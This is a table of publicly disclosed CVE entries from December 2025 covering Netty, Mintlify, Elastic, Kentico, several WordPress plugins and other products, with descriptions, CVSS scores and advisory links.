| netty--netty | Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.129.Final and 4.2.8.Final, the `io.netty.handler.codec.http.HttpRequestEncoder` has a CRLF injection with the request URI when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the URI. Any application / framework using `HttpRequestEncoder` can be subject to be abused to perform request smuggling using CRLF injection. Versions 4.1.129.Final and 4.2.8.Final fix the issue. | 2025-12-16 | 6.5 | CVE-2025-67735 | https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4 |
| Mintlify--Mintlify Platform | The Static Asset API in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via the subdomain parameter because any tenant's assets can be served on any other tenant's documentation site. | 2025-12-19 | 6.4 | CVE-2025-67842 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28 https://news.ycombinator.com/item?id=46317098 https://heartbreak.ing |
| Mintlify--Mintlify Platform | A Directory Traversal vulnerability in the Static Asset Proxy Endpoint in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via a crafted URL containing path traversal sequences. | 2025-12-19 | 6.4 | CVE-2025-67845 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 https://heartbreak.ing/ |
| altcha-org--altcha-lib | ALTCHA is privacy-first software for captcha and bot protection. A cryptographic semantic binding flaw in ALTCHA libraries allows challenge payload splicing, which may enable replay attacks. The HMAC signature does not unambiguously bind challenge parameters to the nonce, allowing an attacker to reinterpret a valid proof-of-work submission with a modified expiration value. This may allow previously solved challenges to be reused beyond their intended lifetime, depending on server-side replay handling and deployment assumptions. The vulnerability primarily impacts abuse-prevention mechanisms such as rate limiting and bot mitigation. It does not directly affect data confidentiality or integrity. This issue has been addressed by enforcing explicit semantic separation between challenge parameters and the nonce during HMAC computation. Users are advised to upgrade to patched versions, which include version 1.0.0 of the altcha Golang package, version 1.0.0 of the altcha Rubygem, version 1.0.0 of the altcha pip package, version 1.0.0 of the altcha Erlang package, version 1.4.1 of the altcha-lib npm package, version 1.3.1 of the altcha-org/altcha Composer package, and version 1.3.0 of the org.altcha:altcha Maven package. As a mitigation, implementations may append a delimiter to the end of the `salt` value prior to HMAC computation (for example, `<salt>?expires=<time>&`). This prevents ambiguity between parameters and the nonce and is backward-compatible with existing implementations, as the delimiter is treated as a standard URL parameter separator. | 2025-12-16 | 6.5 | CVE-2025-68113 | https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959 https://github.com/altcha-org/altcha-lib-ex/commit/09b2bad466ad0338a5b24245380950ea9918333e https://github.com/altcha-org/altcha-lib-go/commit/4a5610745ef79895a67bac858b2e4f291c2614b8 https://github.com/altcha-org/altcha-lib-java/commit/69277651fdd6418ae10bf3a088901506f9c62114 https://github.com/altcha-org/altcha-lib-php/commit/9e9e70c864a9db960d071c77c778be0c9ff1a4d0 https://github.com/altcha-org/altcha-lib-rb/commit/4fd7b64cbbfc713f3ca4e066c2dd466e3b8d359b https://github.com/altcha-org/altcha-lib/commit/cb95d83a8d08e273b6be15e48988e7eaf60d5c08 https://github.com/altcha-org/altcha-lib-java/releases/tag/v1.3.0 https://github.com/altcha-org/altcha-lib-php/releases/tag/v1.3.1 https://github.com/altcha-org/altcha-lib/releases/tag/1.4.1 |
| auth0--auth0-PHP | Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens. Projects are affected if they use Auth0-PHP SDK versions between v8.0.0 and v8.17.0, or applications using the following SDKs that rely on the Auth0-PHP SDK versions between v8.0.0 and v8.17.0: Auth0/symfony versions between 5.0.0 and 5.5.0, Auth0/laravel-auth0 versions between 7.0.0 and 7.19.0, and/or Auth0/wordpress plugin versions between 5.0.0-BETA0 and 5.4.0. Auth0/Auth0-PHP version 8.18.0 contains a patch for the issue. | 2025-12-17 | 6.8 | CVE-2025-68129 | https://github.com/auth0/auth0-PHP/security/advisories/GHSA-j2vm-wrq3-f7gf https://github.com/auth0/laravel-auth0/security/advisories/GHSA-7hh9-gp72-wh7h https://github.com/auth0/symfony/security/advisories/GHSA-f3r2-88mq-9v4g https://github.com/auth0/wordpress/security/advisories/GHSA-vvg7-8rmq-92g7 https://github.com/auth0/auth0-PHP/commit/7fe700053aee609718460c123f00f53c511f0f7f https://github.com/auth0/laravel-auth0/commit/a1c3344dc0e5a36e8f56c8cfc535728d3d7558f3 https://github.com/auth0/symfony/commit/0103d6f8dcef6996653fad1f823d1c167f472479 https://github.com/auth0/wordpress/commit/b207c6f7fd06507b90c4e6bcc18a857ef9e018de https://github.com/auth0/auth0-PHP/releases/tag/8.18.0 https://github.com/auth0/laravel-auth0/releases/tag/7.20.0 https://github.com/auth0/symfony/releases/tag/5.6.0 https://github.com/auth0/wordpress/releases/tag/5.5.0 |
| tox-dev--filelock | filelock is a platform-independent file lock for Python. In versions prior to 3.20.1, a Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. All users of filelock on Unix, Linux, macOS, and Windows systems are impacted. The vulnerability cascades to dependent libraries. The attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. The issue is fixed in version 3.20.1. If immediate upgrade is not possible, use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases); ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks; and/or monitor lock file directories for suspicious symlinks before running trusted applications. These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. | 2025-12-16 | 6.3 | CVE-2025-68146 | https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f https://github.com/tox-dev/filelock/pull/461 https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e https://github.com/tox-dev/filelock/releases/tag/3.20.1 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.1 excessive privileges were possible due to storing GitHub personal access token instead of an installation token | 2025-12-16 | 6.5 | CVE-2025-68267 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| Elastic--Packetbeat | Improper Bounds Check (CWE-787) in Packetbeat can allow a remote unauthenticated attacker to exploit a Buffer Overflow (CAPEC-100) and reliably crash the application or cause significant resource exhaustion via a single crafted UDP packet with an invalid fragment sequence number. | 2025-12-18 | 6.5 | CVE-2025-68381 | https://discuss.elastic.co/t/packetbeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-30/384178 |
| Elastic--Packetbeat | Out-of-bounds read (CWE-125) allows an unauthenticated remote attacker to perform a buffer overflow (CAPEC-100) via the NFS protocol dissector, leading to a denial-of-service (DoS) through a reliable process crash when handling truncated XDR-encoded RPC messages. | 2025-12-18 | 6.5 | CVE-2025-68382 | https://discuss.elastic.co/t/packetbeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-31/384179 |
| Elastic--Filebeat | Improper Validation of Specified Index, Position, or Offset in Input (CWE-1285) in Filebeat Syslog parser and the Libbeat Dissect processor can allow a user to trigger a Buffer Overflow (CAPEC-100) and cause a denial of service (panic/crash) of the Filebeat process via either a malformed Syslog message or a malicious tokenizer pattern in the Dissect configuration. | 2025-12-18 | 6.5 | CVE-2025-68383 | https://discuss.elastic.co/t/filebeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-32/384180 |
| Elastic--Elasticsearch | Allocation of Resources Without Limits or Throttling (CWE-770) in Elasticsearch can allow a low-privileged authenticated user to cause Excessive Allocation (CAPEC-130) causing a persistent denial of service (OOM crash) via submission of oversized user settings data. | 2025-12-18 | 6.5 | CVE-2025-68384 | https://discuss.elastic.co/t/elasticsearch-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-33/384181 |
| Elastic--Kibana | Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an unauthenticated user to embed a malicious script in content that will be served to web browsers causing cross-site scripting (XSS) (CAPEC-63) via a vulnerability a function handler in the Vega AST evaluator. | 2025-12-18 | 6.1 | CVE-2025-68387 | https://discuss.elastic.co/t/kibana-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-35/384183 |
| Elastic--Kibana | Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana can allow a low-privileged authenticated user to cause Excessive Allocation (CAPEC-130) of computing resources and a denial of service (DoS) of the Kibana process via a crafted HTTP request. | 2025-12-18 | 6.5 | CVE-2025-68389 | https://discuss.elastic.co/t/kibana-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-36/384184 |
| Arista Networks--EOS | On affected platforms running Arista EOS with OSPFv3 configured, a specially crafted packet can cause the OSFPv3 process to have high CPU utilization which may result in the OSFPv3 process being restarted. This may cause disruption in the OSFPv3 routes on the switch. This issue was discovered internally by Arista and is not aware of any malicious uses of this issue in customer networks. | 2025-12-16 | 6.5 | CVE-2025-8872 | https://www.arista.com/en/support/advisories-notices/security-advisory/23115-security-advisory-0128 |
| Zohocorp--ManageEngine Applications Manager | Zohocorp ManageEngine Applications Manager versions 177400 and below are vulnerable to Stored Cross-Site Scripting vulnerability in the NOC view. | 2025-12-18 | 6.1 | CVE-2025-9787 | https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-9787.html |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows attackers to leak virtual context URLs via the HTTP Referer header when users interact with third-party domains. Sensitive virtual context information can be exposed to external domains through page builder interactions and link/image loading. | 2025-12-18 | 5.3 | CVE-2019-25228 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.47 Virtual Context Information Disclosure |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via administration input fields in the Rich text editor component. Attackers can exploit this vulnerability to execute arbitrary scripts in users' browsers. | 2025-12-18 | 5.4 | CVE-2022-50681 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.88 Rich Text Editor Reflected XSS |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows attackers to view sensitive stack trace details via Portal Engine form control error messages. Detailed error messages can expose internal system information and potentially reveal implementation details to unauthorized users. | 2025-12-18 | 5.3 | CVE-2022-50686 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0 Portal Engine Form Control Information Disclosure |
| HappyFiles--HappyFiles Pro | Missing Authorization vulnerability in HappyFiles HappyFiles Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HappyFiles Pro: from n/a through 1.8.1. | 2025-12-21 | 5.4 | CVE-2023-25445 | https://vdp.patchstack.com/database/wordpress/plugin/happyfiles-pro/vulnerability/wordpress-happyfiles-pro-plugin-1-8-1-broken-access-control-vulnerability?_s_id=cve |
| Unknown--WBCE CMS | WBCE CMS 1.6.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious HTML and CSS to capture user keystrokes. Attackers can upload a crafted HTML file with CSS-based keylogging techniques to intercept password characters through background image requests. | 2025-12-16 | 5.4 | CVE-2023-53901 | ExploitDB-51566 WBCE CMS Product Webpage VulnCheck Advisory: WBCE CMS 1.6.1 Cross-Site Scripting and Open Redirect Vulnerability |
| websitebaker--WebsiteBaker | WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files with script tags that execute when the file is viewed, enabling persistent cross-site scripting attacks. | 2025-12-16 | 5.4 | CVE-2023-53903 | ExploitDB-51553 WebsiteBaker Product Webpage VulnCheck Advisory: WebsiteBaker 2.13.3 Stored Cross-Site Scripting via SVG File Upload |
| wbce-cms--WBCE CMS | WBCE CMS 1.6.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by uploading crafted SVG files through the media manager. Attackers can upload SVG files containing script tags to the /wbce/modules/elfinder/ef/php/connector.wbce.php endpoint and execute JavaScript when victims access the uploaded file. | 2025-12-17 | 5.4 | CVE-2023-53909 | ExploitDB-51484 Official Product Webpage VulnCheck Advisory: WBCE CMS 1.6.1 SVG File Content Cross-Site Scripting |
| wbce-cms--WBCE CMS | WBCE CMS 1.6.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by inserting script tags into page content through the WYSIWYG editor. Attackers can submit POST requests to /wbce/modules/wysiwyg/save.php with malicious script content in the content parameter to execute JavaScript when users view the affected page. | 2025-12-17 | 5.4 | CVE-2023-53910 | ExploitDB-51484 Official Product Webpage VulnCheck Advisory: WBCE CMS 1.6.1 Stored Cross-Site Scripting via Page Content |
| Zenphoto--Zenphoto | Zenphoto 1.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by inserting HTML content into album descriptions. Attackers can create albums with malicious iframe or script tags in the description field that execute when users view the album page. | 2025-12-17 | 5.4 | CVE-2023-53915 | ExploitDB-51485 Official Product Webpage VulnCheck Advisory: Zenphoto 1.6 Stored Cross-Site Scripting via Album Description |
| Zenphoto--Zenphoto | Zenphoto 1.6 contains a stored cross-site scripting vulnerability in the user postal code field accessible through the admin-users.php interface. When administrators view user information imported as HTML, malicious JavaScript payloads injected into the postal code field execute in their browser context. | 2025-12-17 | 5.4 | CVE-2023-53916 | ExploitDB-51485 Official Product Webpage VulnCheck Advisory: Zenphoto 1.6 Stored Cross-Site Scripting via User Postal Code Field |
| Podcastgenerator--PodcastGenerator | PodcastGenerator 3.2.9 contains a stored cross-site scripting vulnerability in the episode title field accessible through the episodes upload interface (episodes_upload.php). Malicious JavaScript payloads injected into episode titles execute when administrators view the episodes list page (episodes_list.php). | 2025-12-17 | 5.4 | CVE-2023-53918 | ExploitDB-51454 Official Product Webpage VulnCheck Advisory: PodcastGenerator Stored Cross-Site Scripting via Episode Title Field |
| Ulicms--Ulicms | UliCMS 2023.1 contains a stored cross-site scripting vulnerability that allows attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the file management interface that execute arbitrary scripts when viewed by other users. | 2025-12-17 | 5.4 | CVE-2023-53925 | ExploitDB-51435 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1 Stored Cross-Site Scripting via SVG File Upload |
| Php-fusion--PHPFusion | PHPFusion 9.10.30 contains a stored cross-site scripting vulnerability in the file manager that allows attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload SVG files with script tags that execute arbitrary JavaScript when viewed, potentially stealing user session information or performing client-side attacks. | 2025-12-17 | 5.4 | CVE-2023-53928 | ExploitDB-51411 Official Product Homepage VulnCheck Advisory: PHPFusion 9.10.30 Stored Cross-Site Scripting via File Manager Upload |
| Revive-adserver--revive-adserver | Revive Adserver 5.4.1 contains a cross-site scripting vulnerability in the banner advanced configuration page that allows attackers to inject malicious scripts. Attackers can craft a malicious link to the banner-advanced.php endpoint with XSS payloads in prepend and append parameters to execute arbitrary JavaScript when an admin views the page. | 2025-12-17 | 5.4 | CVE-2023-53931 | ExploitDB-51401 Official Product Homepage VulnCheck Advisory: Revive Adserver 5.4.1 Cross-Site Scripting via Banner Advanced Settings |
| Codester--WBiz Desk | WBiz Desk 1.2 contains a SQL injection vulnerability that allows non-admin users to manipulate database queries through the 'tk' parameter in ticket.php. Attackers can inject crafted SQL statements using UNION-based techniques to extract sensitive database information by sending malformed requests to the ticket endpoint. | 2025-12-18 | 5.4 | CVE-2023-53935 | ExploitDB-51451 Official Product Homepage VulnCheck Advisory: WBiz Desk 1.2 SQL Injection Vulnerability via ticket.php Parameter |
| tuzitio--Cameleon CMS | Cameleon CMS 2.7.4 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts into post titles. Attackers can create posts with embedded SVG scripts that execute when other users mouse over the post title, potentially stealing session cookies and executing arbitrary JavaScript. | 2025-12-18 | 5.4 | CVE-2023-53936 | ExploitDB-51446 Product GitHub Repository VulnCheck Advisory: Cameleon CMS 2.7.4 Authenticated Persistent Cross-Site Scripting via Post Creation |
| iwind--RockMongo | RockMongo 1.1.7 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple unencoded input parameters. Attackers can exploit the vulnerability by submitting crafted payloads in database, collection, and login parameters to execute arbitrary JavaScript in victim's browser. | 2025-12-18 | 5.4 | CVE-2023-53938 | ExploitDB-51437 Official Product Homepage VulnCheck Advisory: RockMongo 1.1.7 Stored Cross-Site Scripting Vulnerability via Multiple Parameters |
| TinyWebGallery--TinyWebGallery | TinyWebGallery v2.5 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the folder name parameter. Attackers can edit album folder names with script tags to execute arbitrary JavaScript when other users view the affected gallery pages. | 2025-12-18 | 5.4 | CVE-2023-53939 | ExploitDB-51442 Official Product Homepage VulnCheck Advisory: TinyWebGallery v2.5 Stored Cross-Site Scripting via Folder Name Parameter |
| Glpi-Project--GLPI | GLPI 9.5.7 contains a username enumeration vulnerability in the lost password recovery mechanism that allows attackers to validate email addresses. Attackers can systematically test email addresses by submitting requests to the password reset endpoint and analyzing response differences to identify valid user accounts. | 2025-12-18 | 5.3 | CVE-2023-53943 | ExploitDB-51418 Official Product Homepage VulnCheck Advisory: GLPI 9.5.7 Username Enumeration Vulnerability via Lost Password Endpoint |
| Kentico--Xperience | A cookie security configuration vulnerability in Kentico Xperience allows attackers to bypass SSL requirements when setting administration cookies via web.config. The vulnerability affects .NET Framework projects by incorrectly handling the 'requireSSL' attribute, potentially compromising session security and authentication state. | 2025-12-18 | 5.3 | CVE-2024-58317 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.164 Cookie Security Configuration |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the rich text editor component for page and form builders. Attackers can exploit this vulnerability by entering malicious URIs, potentially allowing malicious scripts to execute in users' browsers. | 2025-12-18 | 5.4 | CVE-2024-58318 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.162 Rich Text Editor Stored XSS |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in administrative users' browsers. | 2025-12-18 | 5.4 | CVE-2024-58319 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.160 Pages Dashboard Widget Reflected XSS |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows public users to access sensitive administration interface hostname details during authentication. Attackers can retrieve confidential hostname configuration information through a public endpoint, potentially exposing internal network details. | 2025-12-18 | 5.3 | CVE-2024-58320 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.159 Authentication Information Disclosure |
| Mitsubishi Electric Corporation--GT Designer3 Version1 (GOT2000) | Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GT Designer3 Version1 (GOT2000) all versions and Mitsubishi Electric GT Designer3 Version1 (GOT1000) all versions allows a local unauthenticated attacker to obtain plaintext credentials from the project file for GT Designer3. This could allow the attacker to operate illegally GOT2000 series or GOT1000 series by using the obtained credentials. | 2025-12-17 | 5.1 | CVE-2025-11009 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-017_en.pdf https://jvn.jp/vu/JVNVU99629801/ |
| jetmonsters--JetFormBuilder Dynamic Blocks Form Builder | The JetFormBuilder - Dynamic Blocks Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the run_callback function in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to generate forms using AI, consuming site's AI usage limits. | 2025-12-16 | 5.3 | CVE-2025-11991 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c08444ef-77bc-4e9d-8d94-04b90cc99ded?source=cve https://plugins.trac.wordpress.org/browser/jetformbuilder/tags/3.5.2.1/modules/ai/rest-api/endpoints/generate-form-endpoint.php#L26 |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.11.0 via the ajax_get_members function. This is due to the use of a predictable low-entropy token (5 hex characters derived from md5 of post ID) to identify member directories and insufficient authorization checks on the unauthenticated AJAX endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, display names, user roles (including administrator accounts), profile URLs, and user IDs by enumerating predictable directory_id values or brute-forcing the small 16^5 token space. | 2025-12-20 | 5.3 | CVE-2025-12492 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61337d2d-d15a-45f2-b730-fc034eb3cd31?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/templates/members.php#L26 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-ajax-common.php#L61 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-member-directory.php#L2795 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-member-directory.php#L205 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/class-functions.php#L41 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3421362%40ultimate-member%2Ftrunk&old=3408617%40ultimate-member%2Ftrunk&sfp_email=&sfph_mail= |
| wedevs--Dokan Pro | The Dokan Pro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `/dokan/v1/wholesale/register` REST API endpoint in all versions up to, and including, 4.1.3. This makes it possible for unauthenticated attackers to enumerate users and retrieve their email addresses via the REST API by providing a user ID, along with other information such as usernames, display names, user roles, and registration dates. | 2025-12-16 | 5.3 | CVE-2025-12809 | https://www.wordfence.com/threat-intel/vulnerabilities/id/534557b0-16d2-4a77-a118-b66fc7474ecf?source=cve https://dokan.co/wordpress/changelog/ |
| lbell--Pretty Google Calendar | The Pretty Google Calendar plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the pgcal_ajax_handler() function in all versions up to, and including, 2.0.0. This makes it possible for unauthenticated attackers to retrieve the Google API key set in the plugin's settings. | 2025-12-20 | 5.3 | CVE-2025-12898 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c15924-d430-48e3-9804-fa83605b9c24?source=cve https://wordpress.org/plugins/pretty-google-calendar/ |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 6.4.8. This is due to insufficient validation of user-supplied input in the 'url' parameter of the fpd_custom_uplod_file AJAX action, which flows directly into the getimagesize() function without sanitization. While direct exploitation via PHP filter chains is blocked on PHP 8+ due to a separate code bug in the plugin, the vulnerability can be exploited via a TOCTOU race condition (CVE-2025-13231) also present in the same plugin, or may be directly exploitable on PHP 7.x installations. This makes it possible for unauthenticated attackers to read arbitrary sensitive files from the server, including wp-config.php. | 2025-12-16 | 5.9 | CVE-2025-13439 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4fd6df9d-2963-44b1-bc4e-e53eda97a2a9?source=cve https://support.fancyproductdesigner.com/support/discussions/topics/13000036024 |
| IBM--UCD - IBM DevOps Deploy | IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 Deploy transmits data in clear text that could allow an attacker to obtain sensitive information using man in the middle techniques. | 2025-12-15 | 5.9 | CVE-2025-13489 | https://www.ibm.com/support/pages/node/7254662 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.16. This is due to the plugin exposing its admin embed endpoint at `/wp-json/ssa/v1/embed-inner-admin` without authentication, which leaks plugin settings including staff names, business names, and configuration data that are not publicly displayed on the booking form. This makes it possible for unauthenticated attackers to extract private business configuration. In premium versions with integrations configured, this might also expose other sensitive data including API keys for external services. | 2025-12-19 | 5.3 | CVE-2025-13754 | https://www.wordfence.com/threat-intel/vulnerabilities/id/10d7a50c-41e9-41b7-a171-d72dbe08e7b7?source=cve https://plugins.trac.wordpress.org/changeset/3421427/simply-schedule-appointments/trunk/includes/class-shortcodes.php |
| onesignal--OneSignal Web Push Notifications | The OneSignal - Web Push Notifications plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings handling functionality in all versions up to, and including, 3.6.1. This is due to the plugin processing POST requests without verifying user capabilities or nonces. This makes it possible for unauthenticated attackers to overwrite the OneSignal App ID, REST API key, and notification behavior via direct POST requests. | 2025-12-15 | 5.3 | CVE-2025-13950 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cf2b5d05-24a3-4bc8-9dde-a7e8ce13ea16?source=cve https://github.com/OneSignal/OneSignal-WordPress-Plugin/pull/387/files |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts | 2025-12-16 | 5.3 | CVE-2025-13956 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c4b833c3-818d-4646-bd6d-8b3be13ea0f1?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/rest-api/v1/frontend/class-lp-rest-orders-controller.php#L36 |
| LINE Corporation--LINE client for Android | LINE client for Android versions prior to 14.20 contains a UI spoofing vulnerability in the in-app browser where the full-screen security Toast notification is not properly re-displayed when users return from another application, potentially allowing attackers to conduct phishing attacks by impersonating legitimate interfaces. | 2025-12-15 | 5.4 | CVE-2025-14020 | https://hackerone.com/reports/2547989 |
| tainacan--Tainacan | The Tainacan plugin for WordPress is vulnerable to unauthorized metadata section creation due to missing authorization checks in all versions up to, and including, 1.0.1. This is due to the `create_item_permissions_check()` function unconditionally returning true, which bypasses authentication and authorization validation. This makes it possible for unauthenticated attackers to create arbitrary metadata sections for any collection via the public REST API granted they can access the WordPress site. | 2025-12-21 | 5.3 | CVE-2025-14043 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5596a0f0-6bfe-4c6e-a0d6-117e13117098?source=cve https://plugins.trac.wordpress.org/browser/tainacan/trunk/classes/api/endpoints/class-tainacan-rest-metadata-sections-controller.php#L363 https://plugins.trac.wordpress.org/browser/tainacan/tags/1.0.1/classes/api/endpoints/class-tainacan-rest-metadata-sections-controller.php#L363 |
| wplegalpages--Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent | The Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the gdpr_delete_policy_data function in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to permanently delete arbitrary posts, pages, attachments, and other post types by ID. | 2025-12-17 | 5.3 | CVE-2025-14061 | https://www.wordfence.com/threat-intel/vulnerabilities/id/866b4ca8-563f-4a19-bbf7-79a79f07d53d?source=cve https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.6/admin/class-gdpr-cookie-consent-admin.php#L8091 https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.6/admin/class-gdpr-cookie-consent-admin.php#L8878 |
| wpshuffle--Frontend Post Submission Manager Lite Frontend Posting WordPress Plugin | The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.5. This is due to missing authorization checks on the post update functionality in the fpsml_form_process AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary posts by providing a post_id parameter via the guest posting form, allowing them to change post titles, content, excerpts, and remove post authors. | 2025-12-21 | 5.3 | CVE-2025-14080 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e9b6514-e727-42fe-8893-a317b71b2760?source=cve https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/trunk/includes/cores/ajax-process-form.php#L104 https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.5/includes/cores/ajax-process-form.php#L104 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419835%40frontend-post-submission-manager-lite&new=3419835%40frontend-post-submission-manager-lite&sfp_email=&sfph_mail= |
| Radiometer Medical Aps--ABL90 FLEX and ABL90 FLEX PLUS Analyzers | A "Privilege boundary violation" vulnerability is identified affecting multiple Radiometer Products. Exploitation of this vulnerability gives a user with physical access to the analyzer, the possibility to gain unauthorized access to functionalities outside the restricted environment. The vulnerability is due to weakness in the design of access control implementation in application software. Other related CVE's are CVE-2025-14096 & CVE-2025-14097. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required configuration for Exposure: Physical access to the analyzer is needed. Temporary work Around: Only authorized people can physically access the analyzer. Permanent solution: Local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit Status: Researchers have provided working proof-of-concept. Radiometer is not aware of any publicly available exploit at the time of publication. Note: CVSS score 6.8 when underlying OS is Windows 7 or Windows XP Operating systems and CVSS score 5.7 when underlying OS is Windows 8 or Windows 10 operating systems. | 2025-12-17 | 5.7 | CVE-2025-14095 